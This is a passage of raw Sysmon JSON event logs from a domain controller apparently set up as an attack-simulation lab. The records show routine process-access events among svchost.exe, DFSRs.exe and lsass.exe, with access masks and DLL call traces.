T4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nSourceProcessId: 2904\r\nSourceThreadId: 3340\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","SourceProcessId":"2904","SourceThreadId":"3340","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 